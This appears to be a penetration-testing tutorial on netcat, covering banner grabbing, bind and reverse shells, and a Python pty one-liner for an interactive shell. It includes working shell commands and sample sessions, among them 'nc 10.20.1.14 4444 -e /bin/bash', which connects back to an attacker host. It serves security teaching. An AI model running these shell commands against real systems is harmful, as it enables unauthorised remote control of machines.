Tool introduction: netcat

Now that we are able to identify open ports and accessible services on a target system, we can also communicate with them. In most cases, specific tools already exist for this purpose. Let’s take TCP port 22, for instance. It is registered with IANA (Internet Assigned Numbers Authority) and standardised for SSH. The openssh-client packet, which provides the tools ssh and scp, for example, can be installed on a Debian. It should be noted that the standardised ports are only considered an agreement, and that using or reserving them for the corresponding services is not compulsory. On the flipside, this also means that our above SSH server could be accessible through any other port.

But how can we communicate with services that are not known to us, and how do we even identify a service on a port? Let us introduce the netcat (nc) tool, which is used to transport standard input or output data over network connections. As we will see below, it does its reputation justice of being a Swiss Army Knife. Generally speaking, netcat offers two modes of operation – it can act both as a client and as a server, as shown by the following command lines:

• Server: nc -l -p ${port}
• Client: nc ${target server} ${target port}

Knowing this, it makes sense to simply establish a connection with netcat on the open ports in order to receive data from the server. For illustration purposes, in this example netcat was used to establish a connection to the target system 10.250.53.33 and TCP port 1035. The port answers with SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3, which can be interpreted as the associated software banner.

~$ nc 10.250.53.33 1035 
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3

So we are able to connect to any service with netcat and get information about the service and its version through the server-side response information. This technique is called banner grabbing. But it should be noted that a server may not necessarily send data. Similar to TCP, we can also use netcat to send datagrams for UDP, for which we once again refer to the manpage (→ man nc).

With netcat, we can not only establish connections to services, but we can also transmit the inputs and outputs from local programs on a computer via the network. And why would this function be of interest to us as an attacker? Let’s remind ourselves of our objective: total takeover or compromise of the target system. And what local program could possibly give us more control over a system than a shell or the terminal itself? So if we are capable of executing a command through a previously identified security hole X, netcat can provide us with a so-called bind or reserve shell.

As the name of a bind shell already suggests, we open a port on the target system and redirect the input and output of a shell or the bash accordingly. To execute a command, all we have to do now is establish a connection from our attacker machine to the remote port:

Attacker:

~$ nc 10.250.53.33 4444 
id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Target system:

www-data@otrs:~$ nc -lvp 4444 -e /bin/bash 
listening on [any] 4444 ... 
10.20.1.14: inverse host lookup failed: Host name lookup failure 
connect to [10.250.53.33] from (UNKNOWN) [10.20.1.14] 59252

Unlike a bind shell, with a reverse shell we open a port on our attacker machine and, in a second step, establish a connection from the target system back to us. In this process, the I/O of a shell or the terminal is connected to the socket. We can then send commands to our target system again as before:

Attacker:

~$ nc -lvp 4444 
listening on [any] 4444 ... 
10.250.53.33: inverse host lookup failed: Unknown host 
connect to [10.20.1.14] from (UNKNOWN) [10.250.53.33] 59805 
id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Target system:

www-data@otrs:~$ nc 10.20.1.14 4444 -e /bin/bash

Interactive reverse shell during netcat session with Python

A reverse shell with netcat is not interactive. This means that tools such as sudo, mysql, su etc. cannot be used or can only be used to a limited extent. If Python is installed on the target computer, a terminal can be easily simulated within the netcat session:

python -c 'import pty; pty.spawn("/bin/bash")'